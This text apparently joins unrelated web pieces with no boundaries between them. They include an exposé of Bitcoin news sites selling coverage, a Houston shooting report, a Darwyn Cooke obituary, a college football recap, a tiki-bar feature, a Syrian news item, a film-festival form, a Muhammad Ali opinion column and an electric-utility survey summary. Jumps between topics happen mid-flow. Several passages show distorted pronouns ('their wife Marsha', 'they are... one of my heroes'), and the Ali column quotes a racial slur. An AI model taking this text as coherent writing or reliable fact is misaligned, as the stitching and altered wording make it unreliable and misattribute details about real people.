I'm working on a new Bitcoin exchange that will be launching soon and we are looking to get some coverage. I was curious if we could pay and have your site feature us in an article?
Anthony
How many sites would take me up on my offer and allow me to pay them for coverage? What sort of rates would they be asking?
I had come in to this with the guess that 25% of the sites I emailed would accept payment for coverage. Would I be wrong?
Just the act of having to pay-to-play is suspicious. Even if they don't guarantee positive coverage the fact they accept payment is a very serious issue.
99bitcoins is a pay-to-play kind of site. You should treat any site that allows others to purchase stories as suspect. Do the writers have your best intentions at heart?
Hey Anthony,
Yes it's possible. Coverage on 99Bitcoins is $250. Let me know if you're interested. This will put you up on the main page for about a month.
Ofir
At the time of publishing this piece 99bitcoins does not have an editorial policy stated anywhere on the site regarding pay to play style submissions.
CoinDesk
In regards to editorial policy the CoinDesk website has sparse details but does state the following.
All editorial team members and writers for CoinDesk disclose their investments and activity in companies associated with digital currency. Investors and employees of CoinDesk are subject to the same rules.
At the time of publishing this piece CoinDesk had NOT replied to my email as Anthony asking if they would publish for payment.
CoinDesk is practicing some questionable things but I can't say they are publishing stories for money.
Coin Fire
Coin Fire nearly immediately shot us an email back stating they do not accept payments for any story, any time. They also did not direct us to purchasing an advertisement on the site in the email.
Hello Anthony,
Thanks for your message. Coin Fire always loves reporting on new products and services that pertain to Bitcoin and other cryptocurrencies.
That said, we do NOT and will NOT accept any sort of payment for stories on our site.
We strive to provide a news source that is honest of bias and do not allow for payments for stories under any circumstances, EVER.
Please send us more details regarding your startup and we will take a look at it and determine if we want to write a story about it.
Thanks,
Mike
At least someone isn't charging it appears and outright says it.
CryptoCoinsNews
These guys have been known for a bit of link bait and even misquoting others but I wanted to give them a fair chance. Turns out they are scum who will accept money like others.
Dear Anthony,
You can always do a sponsored story for 250 USD. One of our authors can write it for you and we will have the story on our front page for at least 48 hours.
And you can post the announcement in our forum:
http://www.cryptocoinsnews.com/bitcoin-forums/forum/announcements
David Parker
This message contains confidential information and is intended only for the individual named. If you are not the named addressee you should not disseminate, distribute or copy this e-mail. Please notify the sender immediately by e-mail if you have received this e-mail by mistake and delete this e-mail from your system. E-mail transmission cannot be guaranteed to be secure or error-free as information could be intercepted, corrupted, lost, destroyed, arrive late or incomplete, or contain viruses. The sender therefore does not accept liability for any errors or omissions in the contents of this message, which arise as a result of e-mail transmission. If verification is required please request a hard-copy version.
Well, it might be “marked confidential” but I am publishing it anyways. This sort of signature lines have NEVER held up in court.
To make matters worse this is one of “Zero Blocks” media partners. We will go in to more details about that in this piece and why I am horribly disappointed in the Zero Block team because they are actively contributing to this problem as well.
CryptoArticles
These guys aren't making it much of a secret that they write features if you pay them as “sponsored posts”. The issue I have at the moment is how do you know what is a sponsored post? They shouldn't be taking money for articles and presenting them as articles. If they take money for articles, you shouldn't trust them. Plain and simple.
The Crypto Crimson
These guys have an editorial policy stated on the site as follows:
Each of our journalists are expected to maintain complete transparency, meaning that any investments or holdings falling under the categorization of editorial content in relations to digital currency should be disclosed accordingly.
Each of our writers are required to provide a brief bio along with at least one form of contact information.
At The Crypto Crimson, we believe that all journalists should be held accountable for their work and that they should be easily accessible in the case that there may be any discrepancy in the content provided.
They did not respond to “Anthony's” request so we can assume they actually follow the statement on the site that they hold journalists accountable.
The Super Super Super Bad Players
The following coin “news” sites all accept paid submissions from a single broker and as such should NEVER EVER be trusted.
The Bitcoin News — http://TheBitcoinNews.co.uk
Crypto Articles — http://www.CryptoArticles.com
Bitcoin Views — http://BitcoinViews.com
Crypto Biz Magazine — http://CryptoBizMagazine.com
Coin Speaker — http://www.CoinSpeaker.com
Bitcoin Warrior — http://BitcoinWarrior.net
Bitcoinist — http://Bitcoinist.net
Coin Report — http://CoinReport.net
What have we learned?
We can barely trust any Bitcoin news sites. We have a lot of really, really, bad players…
What can we do?
If we want to see real change we have to show the bitcoin “journalists” that we are no longer going to keep supporting them.
Stop donating to the bad players. They are clearly receiving funding from other companies anyways. It is SHOCKING to me how many people will give money to these jerks.
Don't upvote on /r/bitcoin. Each time you give them a vote up you are literally helping spread the site to new and established users alike and giving a vote that you are okay with this sort of practice. If you truly feel strongly I suggest downvoting the features from the bad players until they change policies. /r/bitcoin drives an INCREDIBLE level of traffic to the bad players. If you want them to change stop helping them.
Visit a site such as CoinJabber and leave your dissatisfaction in a review with these sites and the current policies allowing for pay-to-play in a review. Sites such as CoinJabber are a common stop for new users who don't deserve to be burned by this sort of “journalisim”.
Contact the bad players and ask them why they engage in this practice. Let's see how many of them will stop. Tell them you are dissapointed. Many will defend the practice saying it is the only way they can stay online. If that is the case perhaps they should be in a different business.
Visit the good players listed above. At the time of this publication they were not accepting payments for features. You can count that I'll be following up in the future.
Tell Zero Block to remove the “media partners” who are bad and dirty players by accepting cash for stories. The fact that they actively keep adding sites that are known to accept payments for placement makes them just as guilty — especially given that some of the more honest sites have been unable to get on the application.
HOUSTON - A man was killed and three others injured — including a small boy — after shots were fired at an apartment complex pool in southwest Houston, according to investigators.
Houston Police Department officials said the shooting happened around 6:45 p.m. Sunday at the Napoleon Square Apartments in the 6200 block of Renwick Street.
“I walked outside and I saw a man lying dead there, right in the middle of the street. They were just lying there near the pool,” Michelle Guerrero said.
Investigators said a group of people got into an argument near the pool. There was yelling, there was gunfire and in the mayhem, a 40-year-old man was shot and killed. A 19-year-old man and a woman, 21, were shot and a 3-year-old boy was grazed.
The man was pronounced dead at the scene. The three injured were taken to a local hospital and are expected to survive, police said.
HPD is investigating.
No arrests have been made in the case.
Anyone with additional information about the shooting is asked to contact the HPD Homicide Division at 713-308-3600 or Crime Stoppers at 713-222-TIPS.
Copyright 2016 by KPRC Click2Houston - All rights reserved.
Over the past few weeks, we've heard a lot about these phone calls that powerful and inhuman robots have sent screaming through the phonelines into our very home, interrupting our rapt contemplation of how Joe The Plumber's existential dilemmas speak to our own lives, in order to talk about the secrets and lies our presidential candidates are keeping from us. I hate getting these robocalls worse than I hate getting them from creditors, but, as it turns out, using the robots does have its advantages. At least until they turn on us.
Shaun Dakin, who runs the National Political Do Not Contact Registry - Stop Political Calls Blog, and who provided us with this awesomely bad phone-sex robocall from yesterday, transports us today to the state of Minnesota, where robocalls are illegal. This forces candidates to employ real life human beings to make these calls and read from scripts. And that places the McCain campaign at a significant disadvantage, since their campaign ceased generating wide-spread, general enthusiasm at some point after the New Hampshire primary. Listen for yourself at this McCain call, in which boredom and illiteracy get in the way of the salespersonship.
Comics / Comics News
Canadian Cartoonist Darwyn Cooke Passes Away
By Hervé St-Louis
Batman: Ego
Batman Beyond
DC: The New Frontier
Parker
Update: Earlier last night, the death of cartoonist Darwyn Cooke was unofficially announced by industry professionals. This morning, the passing of Cooke has been confirmed . ComicBookBin offers its sincere condolences to Cooke's family and close friends. I am a big fan of Darwyn Cooke. He's a role model for me.On the morning of May 13, 2016, comic fans and creators learned through a post on Darwyn Cooke's blog by their wife Marsha Cooke that the Canadian cartoonist had been transferred to palliative care following an aggressive bout with cancer. Hours later Cooke passed away.Cooke who lived in Halifax in their last years, was a Torontonian who had worked mostly in magazine publishing after having been rejected from the world of comics in the mid-1980s for having a retro 1950s look that did not correspond to the taste of times. Cooke returned to comics in 2000 withafter having worked with Warner Animation on DC Comics series likeCooke's best known in comics was related to the revamp of the Catwoman character andmini-series. Cooke, who was known as someone who told it like it is often complained as being typed-cast for only retro-related work at DC Comics and other publishers. Their best known solo work was the adaptation of thenoir novels by writer Donald E. Westlake at IDW Publishing.Cooke was the recipient of many awards during their brief comic book career.Cooke's family asks that donations be sent to the Canadian Cancer Society or the Hero Initiative
Join the discussion:
The MAC's reach exceeds it's grasp as the conference goes 3-10 to close out OOC play. While I would still consider the general MAC OOC schedule a success in '15, it is hard not to look back and think about what might have been. Regardless, let's start the recap on the positives this week.
THE GOOD
Bowling Green 35 – Purdue 28
Bowling Green beat former Kent State Head Coach Darrell Hazell's Boilermakers, making 2015 the third consecutive year that Purdue has lost to a MAC team (2013 NIU, 2014 CMU). While this is a MAC post, I'm going to focus on Purdue for a minute: fire Morgan Burke. If you don't know, you can probably guess, Morgan Burke is Purdue's AD. Here is an interesting fact about Morgan you may not know: Morgan is in their 22nd year as AD and the fourth longest tenured AD for an FBS school in the nation. Why? I just don't get it. Purdue is a great school with a strong student body, they deserve better.
With that being said, Bowling Green did enough this week to continue their undefeated ways in 2015 against B1G teams (also against teams not from Tennessee).
Matt Johnson threw the ball 59 times for a little over 400 yards in the 35-28 victory, but it was a run play by Travis Greene that sealed the win for the Falcons. Greene took a handoff up the middle for 12 yards and a TD with 14 seconds left in a tied game.
The Falcons, who have now beat two B1G teams this year and three B1G teams in the past two years, head into MAC play next week at Buffalo.
Akron 35 – Louisiana Lafayette 14
In what I think will prove to be a more impressive win than BGSU's victory over Purdue, the Zips maintained control over the Ragin' Cajuns throughout the game in Louisiana. Zip quarterback Thomas Woodson went 13/29 for 289 for 2 TD's and 1 INT, including a 72 yard over the top pass to Jerome Lane for a TD. Woodson also ran for 93 yards and a TD on 8 runs.
The Zips defense held ULL to 285 and took the ball away four times.
Overall, it was a very impressive performance from the Zips, and they should not be taken for granted heading into MAC play. Akron will be at home against Ohio next weekend, in what will be a great game.
Toledo 37 – Arkansas State 7
The Rockets continued their undefeated season at the Glass Bowl versus Arkansas State. This game was over early as Toledo took a 24-0 lead four minutes into the second quarter. I'm not sure the Buckeyes could come back from 24 against this Toledo defense. The Red Wolves couldn't either, only scoring seven the rest of the game on a kickoff return TD.
Toledo's D held the Red Wolves to 209 yards of offense, and took the ball away five times.
Toledo heads into Muncie next week to take on Ball State. The Rockets are the favorite to win the MAC by the majority of college football analysts.
Marshall 36 – Kent State 29 (2OT)
Marshall admittedly are not the team they were last year, but still a pretty damn good team. The Thundering Herd improved to 3-1 with a 2OT win against KSU. The Herd beat Purdue by ten to open the season before falling to Ohio by eleven. This is a ‘good' loss for the Golden Flashes simply because of the way they are trending. After getting their asses handed to them in their opening to the Illini (THE ILLINI!), the Golden Flashes destroyed Delaware State (yes, there is a Delaware State), and lost by three to the Golden Gophers.
The passing game for KSU was pretty awful, with Colin Reardon going 13/34 for 189 yards. They didn't throw a pick, however, and threw two touchdowns. Trayion Durham ran for 114 on 31 carries with one TD.
Kent State held the Herd to 277 yards and took the ball away three times (+2 TO differential), but it wasn't enough.
While a win versus former MAC dynasty Marshall would have been great for Kent's confidence, the Golden Flashes are looking to play the role of spoiler this year in the crowded MAC East. I really don't know where to project them. They are my Ball State of the East.
Kent State opens their MAC schedule at home versus Miami this weekend. I foresee a Golden Flash win.
Ohio 24 – Minnesota 27
Minnesota scraped out their third straight win by three (and second against a MAC team) against Ohio this weekend.
Darius Vick opened the scoring with a 39 yard bomb to Papi White on play action. Vick finished the game 17/27 for 194 yards and two touchdowns. The Bobcats rushed for 151 yards on 38 carries against the Golden Gophers. The Bobcats never turned the ball over.
The defense wasn't there late for the Bobcats, however, as the Gophers went 78 yards on 11 plays for a TD to take a three point lead. The drive only took 2:06 but left the Bobcats with 30 seconds left for a comeback try.
The Bobcats head into MAC play at 3-1. They take on the Zips in Akron next weekend in what may be a season defining game for both teams.
Ball State 19 – Northwestern 24
Ball State left seven point on the board with two missed field goals and a missed extra point in the five point loss to the Wildcats. The #17 ranked Wildcats had seven players leave the game with injuries, however. Ball State now has lost to Texas A&M and Northwestern.
Riley Neal passed for 178 yards on 35 attempts with two touchdowns for the Cardinals. They also ran for 74 yards on 16 carries. Ball State won the turnover battle by two, but the defense just couldn't stop bleeding yards against the Wildcats (546).
The Cardinals already opened their MAC schedule with a 28-17 win against Eastern. The take on Toledo in Muncie this weekend, followed by NIU in DeKalb. Godspeed Cardinals.
THE BAD
NIU 14 – Boston College 17
The defending MAC champions fell short of a rebound from a loss from the defending national champions this weekend in Boston.
The Huskies offense just couldn't get going against one of the best defenses in the nation.
Second year starter Drew Hare went 11/25 for 81 yards, no TD's, and one interception. The Huskies ran for 71 yards, with a 2.3 yards/carry average. Kenny Golladay had two receptions for seven yards and a fumble.
There is a new star on defense in DeKalb, however. Shawun Lurry returned an interception for 79 yards (Not Kenny Golladay like ESPN says) to set up NIU's only offensive TD on the day. Lurry was coming off a two interception performance against the Buckeyes, and now is tied for the lead in nation (in FBS) with four interceptions.
Aregeros Turner made it close at the end with an 86 yard kickoff return for a TD late in the game, but it just wasn't enough.
The Huskies head to Mt. Pleasant to take on Central Michigan this weekend. I predict a big day for wide receiver Kenny Golladay, and for the NIU offense to start clicking again.
Central Michigan 10 – Michigan State 30
The Chips lost to the third P5 team they faced this weekend when they took on the Spartans.
The game was 17-10 MSU in the third, but CMU just couldn't keep up. Cooper Rush went 26/39 for 285 yards and a TD. The Chips were held to 55 yards on the ground.
The Chips surprisingly got more yards than the Spartans on the offensive side (340-329). They were -1 in the turnover battle, however.
The #2 ranked Spartans improved to 2-0 over the back after beating Western Michigan 37-24 in Kalamazoo to open the season.
Central Michigan take on NIU at home next weekend.
Nevada 24 – Buffalo 21
The Bulls dropped to 2-2 after losing to Nevada by a field goal at home this weekend. Buffalo quarterback Joe Licata went 28-46 for 338 yards, two touchdowns, and two interceptions. Jordan Johnson ran for 79 yards on 13 carries for the Bulls.
It was a combination of poor run defense and turnovers that lost the game for the Bulls, however, as they let the Wolf Pack run for 289 yards on 39 carries and lost the turnover battle by three. It seems like Bulls fans may be missing a little #MACKtion.
Buffalo takes on Bowling Green at home. Be on the lookout for an upset here.
THE UGLY
Western Michigan 12 – Ohio State 38
This one is admittedly borderline bad/ugly.The Broncos fell the the defending champs by 26 over the weekend to fall to 1-3, albeit with two losses to the top two teams in the nation. Zach Terrell went 18-33 for 169 yards, two touchdowns, and one interception. Jamauri Bogan had 23 carries for 93 yards for the Broncos.
The Broncos couldn't take advantage of a +1 TO advantage.
Cardale Jones went 19/33 for 288 with two TD's and one pick. JT Barrett went 1/3 for 0 yards and one pick.
Fleck's Broncos gave up 511 yards to the Buckeyes, but had 15 more minutes of possession over tOSU.
The Broncos did manage 20 first downs, which is impressive.
WMU have a bye week and start their MAC games vs CMU in Kalamazoo on the 10th.
UMass 27 – Notre Dame 62
UMass continued their winless ways vs Notre Dame this weekend. UMass kept it close throughout most of the first half. But late in the second quarter ND's Newsome placed a 52-yard punt on the Massachusetts 1, the Fighting Irish defense held the Minutemen to a yard on three plays and Sanders answered with a 50-yard punt return that helped spark Notre Dame.
Blake Frohnapful went 20/40 for 233 yards, no TD's and a pick. Ross Comis took the last two drives for the Minutemen and went 8/8 for 69 yards and a TD. UMass rushed for 148 yards and three TD's, with a solid 5.1 YPC.
UMass's defense let up 681 yards, 457 of which were on the ground.
UMass takes on FIU next week, and begins their MAC farewell tour on the 10th vs Bowling Green.
Miami 14 – Western Kentucky 56
Western Kentucky is good. I get it. But Miami is bad, really bad. The RedHawks dropped their third straight in a blowout loss in Kentucky. Everything looked bad for Miami, so I'll highlight the worst: their pass D. Brandon Doughty went 33-41 for 457 yards and 6 touchdowns for the Hilltoppers.
Miami hits the road to take on Kent State next week. Comments please: Miami over/under 1.5 MAC wins. Where are you at?
Army 58 – Eastern Michigan 36
The winless Black Knights are no longer winless after their matchup in Ypsilanti. The win ended Army's 21 game losing streak in games away from home (very surprising to me). The Eagles gave up 556 yards on the ground. Army had 7.8 YPC. I'm out.
Eastern, and their awful run defense, takes on Fournette and the LSU Tigers this weekend. Here is a fun picture for the Eagles fans out there:
Picks for next week:
NIU -2.5 @ CMU
-2.5 @ CMU Akron +4 v Ohio
+4 v Ohio Toledo -9.5 @ Ball St
-9.5 @ Ball St UMass Ev v FIU
Ev v FIU Buffalo +6.5 v BGSU
+6.5 v BGSU Miami +10.5 @ KSU
+10.5 @ KSU LSU -45 v EMU
-45 v EMU WMU +2.5 v THE BYE
Advertisements
In 1989, Donald Trump closed the Trader Vic's in their newly purchased Plaza Hotel in New York. They said the tiki bar was "tacky."
It seems fitting that the man so many of us seek to escape now tried to shut down an establishment created specifically to transport guests to another life, practically another planet.
Tiki was invented in Los Angeles in the 1930s by a man who went by the moniker Don the Beachcomber and their business partner, Sunny Sund. They were rivals and friends with the Oakland business owner, Victor Bergeron, who started the Trader Vic's chain of tiki palaces. Bergeron invented the mai tai; Don and their team of mostly Filipino bartenders were responsible for many of the other tiki drink classics. They both created the "Polynesian" myths and brought showmanship to drinking (to this day, a scorpion bowl is usually served with a lot of chanting and stage smoke), and Sund added the Cantonese-American food to the equation.
Continue Reading
Dale Dudeck
Tiki's popularity has waxed and waned in the 80-odd years since it first hit the scene, but it's making a huge comeback right now, especially in its birthplace of Southern California.
There's been a slow progression over the past few years building up to this renewed tiki dominance. Rather than being confined to dive bars, tiki drinks are taking over the menus at such L.A. hot spots as Here's Looking at You (the Koreatown restaurant where one of two mai tais on the cocktail menu costs $26) and Salt's Cure, where the most interesting cocktails include rum and juice. West Hollywood restaurant E.P. & L.P. sells its own tiki mugs. Sonny's Hideaway in Highland Park is the best place to celebrate #TikiTuesday, but if Instagram is any indication, that's a global weekly holiday.
A drinks list from the Tonga Lei in the 1970s Courtesy Los Angeles Public Library
The grand opening of the Pacific Seas, on the third floor of Clifton's in Los Angeles, marked a huge moment for tiki. It's an enormous bar by any measure, and dedicating it all to tiki seems a huge leap of faith, given that tiki is often perceived as kitsch without substance. That is, of course, incorrect — tiki drinks, with their fresh ingredients and layered rums, were the original mixology.
"I use the analogy of the Tiffany lamp. The original Tiffany lamps are so beautiful and stunning and meticulously crafted and they're exquisite and best in the entire universe," says Andrew Meieran, owner of Clifton's and Pacific Seas. "Then a bunch of people knocked them off and then they became synonymous with cheap knockoffs of nasty weird lamps. I think that the same thing happened with tiki. You had these incredible hand-crafted cocktails and people thought they could just re-create them by just re0creating them. That's obviously not the case. You ended up with a bunch of things that were delicately balanced and with very quality ingredients that suddenly turned into extremely sweet, un-delicately balanced things. Suddenly that became synonymous with tiki, and the originals got swept under the rug."
Indeed, the original recipes are in many cases lost to the public consciousness. It is a common misconception that mai tais contain pineapple juice — and sadly, the reason so many people think that is because so many bars make them that way.
EXPAND Pacific Seas Jesus Banuelos
This tiki coctail resurgence goes hand-in-hand with a need for playfulness in this dark world, of course. "A lot of people want to play dress-up, and now they can drink, too," says Marie King, bar manager at Tonga Hut in North Hollywood and Palm Springs. "Look at the crossover of people who are into tiki and are also into Disney. It's huge." Still, there's no need to drink crappy cocktails just because the vibe is whimsical.
In fact, one of the most hard-to-get-tickets in L.A. right now is Coconut Club, founded by "unabashed tiki nut" Nathan Hazard. The supper club–style events that Coconut Club puts on — most recently they've been setting up at Pacific Seas — prioritize the fun of tiki, with variety show entertainment, karaoke and games. But the drinks they serve are thoughtful, balanced and aware of the history of cocktails.
Of course, anything retro has at least some problematic elements to it. Tiki, though it was invented in California almost entirely of whole cloth, does grapple with that fact that it appropriated some elements of Polynesian culture, largely without context. "Tiki was meant to be faux Polynesian. It was escapism, but probably if it started today we wouldn't use such culturally insensitive terms," King says.
You'll see that change reflected in the new tiki bars popping up, where the focus is less on velvet paintings of bare-chested brown people, and more on the drinks. In fact, the design of tiki spaces is morphing from something that references the South Pacific directly to a look that's evocative of travel in general. Pacific Seas incorporates a lot of maps, and the walls of Test Pilot in Santa Barbara are covered in ship steering wheels.
A lot of Americans vowed to leave the country if Trump won. That isn't actually feasible for most of us, but a night in a dark bar with a strong drink certainly is.
Unknown assailants killed five nuclear engineers Sunday while they were on a bus just north of Damascus, near the research center where they worked, a monitor said on Sunday.
Follow Ynetnews on Facebook and Twitter
The Britain-based Syrian Observatory for Human Rights, which relies on a network of sources on the ground for its reports, was unable however to say how they were killed or supply their nationalities.
"Unidentified attackers murdered five nuclear energy engineers who worked in the scientific research centre near the neighbourhood of Barzeh, northern Damascus," said Observatory director Rami Abdel Rahman.
"It was not immediately clear whether the bus that they were travelling on was hit by a bomb, or by gunfire," Abdel Rahman told AFP.
In July last year, six people who worked at the same center were killed in a mortar attack carried out by rebels seeking President Bashar al-Assad's ouster.
Another military research center, also near Damascus, was also hit by a deadly Israeli raid in May 2013.
Your Name (required)
Your Email (required)
Your Role (required)
Director Producer Writer Cast Crew Other
Film Title
Genre(s)
Approximate Runtime
Brief synopsis of your film (for promotional materials. Keep it short)
Where was this film primarily produced?
Pittsburgh/Western PA Elsewhere in Pennsylvania Ohio West Virginia Elsewhere in the USA Outside of the USA
Submission Type
Film Viewing Link
Film Access Password (if needed)
Link to Trailer (if available)
If selected, who will attend Haunted Oaks Film Festival on October 1st to represent your film? Check all that apply. Please be realistic 🙂
Writer Director Cast Crew Producer DP Regretfully, None of the Above is Able to Attend.
FOR AWARDS CONSIDERATION: Please provide a complete list of credits for the cast, crew, and creators of this film, or an up-to-date IMDB link with the complete information. Please double-check names and credits, so that we may recognize everyone who contributed to your film.
OPTIONAL: APPLY FOR FEATURED TITLE STATUS? (RECOMMENDED)
If you apply for Featured Title status, you agree to the following:
- EXCLUSIVE SCREENING DURING PERIOD OF HAUNTED OAKS: I agree that my film will NOT BE SCREENED at any other at any other PA, OH, or WV film festival/public screening during the period of September 9th and October 8th, 2016. My film will screen exclusively at Haunted Oaks Film Festival during the two weeks PRIOR to, and one week AFTER Haunted Oaks Film Festival.
- PREFERRED SELECTION REVIEW: I understand that by applying for Featured Title Status, my film will have an ADVANTAGE in the selection and promotional process of Haunted Oaks Film Festival. However, this application will have no bearing on the jury's ultimate award decisions.
_ NON-JURY PREFERENCE WAIVER: I understand that, if selected, my decision to apply for Featured Title Status will not affect my chances of winning any award associated with Haunted Oaks Film Festival.
- PROMOTIONAL CONTENT WAIVER: I understand that my film's title, synopsis, and promotional imagery may be used (with my pre-approval) for promoting my film as a FEATURED TITLE, or HEADLINING film at Haunted Oaks Film Festival 2016.
- FEATURED HEADLINE USE: I understand that by applying for Featured Title Status, my film may be selected as a HEADLINING title to market Haunted Oaks Film Festival to a broader audience, and I may be asked to participate in PRESS-RELATED events or phone interviews before or after Haunted Oaks Film Festival 2016.
LAST WORDS (optional)
Anything else we should know about this film? Where did the inspiration for this film come from? Behind the scenes anecdotes? Easter eggs to look out for? Anything at all you'd like to us know before watching your picture:
Even saints weren't really "saints," at least in the sense that we have come to understand that term: the idea of holy men and women of unlimited kindness, patience and virtue. On top of miracles verified by the Catholic Church, what actually made most saints a "saint" was their single-minded determination to get something done. And oftentimes, in order to get this thing done, the person behind that effort had to be something of a hard-headed, single-minded, feelings-bruising son of a bitch.
If you want perfection from your heroes, I suggest you find another hobby.
Muhammad Ali was far from perfect, they are, however, one of my heroes. The centerpiece in the home office where I am right now writing this and have performed all of my activism over the last decade or so, is a framed photograph of Ali in their prime standing over and taunting a vanquished Sonny Liston. Ali themselves signed the photo in 1995. I have also framed the photo of Ali signing the photo.
Politically, culturally and socially, Ali and I agreed on practically nothing. As a young man, the newly-crowned heavyweight champ, fresh from their earth-shattering upset over Liston, announced their conversion to Islam and membership in Elijah Muhammad's bizarre and racist Nation of Islam cult. They would later refuse to serve their country in Vietnam and end their lives as a globalist. Me? I'm a patriotic, Roman Catholic who firmly believes that one of America's great sins was abandoning our allies in South Vietnam.
When it comes to how the world should be, Ali was the furthest thing from my North Star. And as remarkable as they were, Ali's athletic accomplishments have little to do with my admiration for the man. Wayne Gretzky, Michael Jordan, and Pelé are all tremendous athletic competitors, their own "Greatest" within their chosen sport, and they certainly seem like decent enough fellas, but… no.
What I admire about Ali is that they were something incredibly rare and courageous; one of the hardest things to be during their time, or any time -- Muhammad Ali was their Own Man.
Despite what popular culture tries to sell us today, renouncing their Christian faith and joining the National of Islam was not seen as a cool or popular decision in 1963 -- even within the black community, which is largely Christian. And it certainly wasn't popular within the establishment media, especially the sports media.
No, the courage of Ali's decision to shed the skin of Cassius Clay and become Muhammad Ali went far beyond bucking popular opinion. By thumbing their nose at the Christian faith, the liberal notion of racial integration, and the entire boxing world, Ali set themselves up for a spectacular fall. Unlike so many today who pretend to be courageous, Ali couldn't bury themselves within the velvet bubble of an academia or Rockefeller Center where they would constantly be reassured of their courage.
Rather, Ali did what they did with no protection, no shield, and no escape. With much of the public hoping they would get their comeuppance at the hands of a fighter who did "toe the line," again and again, Ali had to risk historic humiliation before the world, and do so in the middle of a boxing ring wearing only shorts and shoes.
With all of their beauty and eloquence and charisma and talent, in order to be their Own Man, Ali chose to be the villain in a profession where there is no place to hide, where the ultimate humiliation is just one punch away. A loss in the ring would not only have meant a professional loss for the Champ, it would have been interpreted as a loss for everything they stood for.
In 1967, at the height of the Vietnam War and their athletic prime (he was 25), Ali was drafted to serve in the Army. On religious grounds, they refused. The response from the government and the boxing world was immediate and potentially disastrous. Ali was swiftly convicted of draft evasion and sentenced to five years in prison. They were also stripped of their heavyweight title and, unforgivably, of their livelihood. For four years, no American commission would sanction them in a fight. Moreover, they were not allowed to leave the country while free on appeal.
This quote published at NBC News probably sums up their complicated reasoning better than their more famous quotes on the subject. (e.g. The Viet Cong "never called me nigger.")
"My enemy is the white people, not Vietcongs or Chinese or Japanese," Ali told one white student who challenged their draft avoidance. "You my opposer when I want freedom. You my opposer when I want justice. You my opposer when I want equality. You won't even stand up for me in America for my religious beliefs and you want me to go somewhere and fight but you won't even stand up for me here at home."
First off, had I been a black man in the 1960s, I would have stood with Malcolm X (another hero of mine I almost always disagreed with) and not Martin Luther King. Without question, King was a legitimately great man, a true American hero. But when it comes to the government (or anyone) violating my God-given rights, I am a pure, 100%, Grade-A radical wholly uninterested in niceties and anything nearing patience or diplomacy. That's my attitude without having experienced even 1% of what a black man born in Kentucky in 1942 experienced.
More importantly, let's look at what Ali did not do. They did not grab their fortune and run to a foreign country without extradition that would treat them like a King and sanction their fights. Even more impressive, with their fortune, profession, and very freedom on the line, they did not accept a compromise from the government that would allow them to fulfill their military service as a noncombatant.
What Ali did do was fight the United States federal government for their God-given religious rights. They didn't flee The System, they didn't use their celebrity to game The System; instead, they literally risked everything to fight The System. And after four costly years, they beat The System in a unanimous Supreme Court decision.
Even before fascist American governments began forcing Christians to bake same-sex wedding cakes -- to choose between their immortal souls and their livelihoods, I admired Ali's stand. Today, I thank God for it.
Muhammad Ali could be cruel (his treatment of Joe Frazier was unforgivable), vain, petty, a bully, and dead wrong. But they were "The Greatest," not because of their misguided beliefs but because of their courageous willingness to time and again risk everything to stand up for those beliefs.
Cassius Clay, Muhammad Ali, the Louisville Lip, the Champ, the Greatest…. There will never be another like him.
Godspeed, Champ.
Follow John Nolte on Twitter @NolteNC
Today, President Trump is poised to release a long-anticipated executive order to roll back the Clean Power Plan, the Obama administration's signature climate initiative.
The order is expected to be accompanied by directives to lift a moratorium on federal land coal leases and to cease the use of the social cost of carbon — all part of a broad campaign to dismantle environmental regulations on the power sector that Trump blames for the decline of the coal economy in the United States.
But while rescinding the rules could help slow coal power's decline in the short term, analysts say it is unlikely to reverse its long-term downturn, mostly due to the economics of natural gas and renewables.
That attitude is shared not just by market observers, but by electric utilities themselves. According to Utility Dive's fourth annual State of the Electric Utility Survey, the sector plans to keep moving steadily toward a cleaner, more distributed energy future — no matter what happens with the Clean Power Plan.
For an in-depth look at the survey results and insights into the state and future of electric utility, get the full report »
Early in 2017, Utility Dive surveyed more than 600 electric utility professionals across the United States. The results indicate that utilities expect to source more power from renewables, distributed resources and natural gas in the coming years, while coal continues to decline.
The outlook of utility executives on the future power mix State of the Electric Utility 2017
The results reflect a sector that largely supports some form of carbon regulation on the federal level. Though more than two-thirds of respondents indicated their company owns generation resources, only a quarter said they do not want the federal government to pursue a policy of decarbonization whatsoever.
Utility executives' sentiment on federal decarbonization policy State of the Electric Utility 2017
Those responses are two of the top-line takeaways from this year's 92-page report, which reveals a sector that is grappling for policy certainty on both the state and federal levels as it deals with an influx of new technologies and customer demands. Here are some more key findings from the report.
Most pressing challenges
President Trump's push against carbon rules may grab headlines, but the 2017 survey indicates utility executives are significantly more concerned about other issues.
For the first time, physical and cybersecurity topped the list of utility sector concerns in 2017, with nearly three quarters of respondents indicating it is either “important” or “very important” today.
Security concerns were followed by more familiar utility issues with distributed energy policy, rate design reform, aging grid infrastructure and reliable integration of renewables and DERs — all issues which tracked close to the top in past Utility Dive surveys, the report notes.
The full chart of 20-plus utility challenges is available in the survey report. State of the Electric Utility 2017
The responses reflect a “deep unease in the utility industry over the state of its cyber protections,” according to the survey, after media reports of Russian election hacking and a scare over possible Kremlin malware at a Vermont utility.
But security worries, while paramount to utilities, are far from their sole concerns. A majority of respondents indicated that the top nine issues facing utilities are either “important” or “very important” today, suggesting that the “growing complexity of the power sector and a rapid influx of emerging technologies are combining to create new concerns for electric utilities, while long-standing issues remain unresolved.”
Power generation
While utilities largely expect to add more renewables and gas in the coming years, the 2017 survey does include one bright spot for coal.
A plurality of respondents indicated their outlook on the resource is generally more favorable as a result of the Trump presidency, though they also overwhelmingly indicated they do not expect to source more power from coal plants themselves.
How utility executives believe the election of Donald Trump will affect various generation resources State of the Electric Utility 2017
Even if new coal plants are not planned, a rollback of the Clean Power Plan could allow some existing plants to operate longer in the future.
The future impacts of any regulatory actions still remain unclear. Earlier this year, the EIA forecasted that rescinding the Obama-era rules could allow coal to recapture the top spot in the U.S. power mix. But, the federal agency warned, an expansion of natural gas production could easily counteract that and contribute to an even faster decline for coal.
The sector's uncertainty over the impacts of future environmental and market policy looms large in the 2017 survey. For the first time, respondents named policy uncertainty as the top challenge associated with their changing fuel mixes, beating out both customer cost and reliability concerns.
Utility executives' greatest concerns with their changing fuel mixes State of the Electric Utility 2017
DERs and rate design
While utilities appear less sure about the future of bulk power resources, they are more confident about the trajectory of distributed energy resources.
More than 70% of respondents indicated they expect moderate-to-significant growth in rooftop solar, demand-side management and behind-the-meter storage. To facilitate the interconnection and control of those resources, more than 80% said they expect to see growth in grid communication technologies
Utility executives' outlook on various distributed energy resources State of the Electric Utility 2017
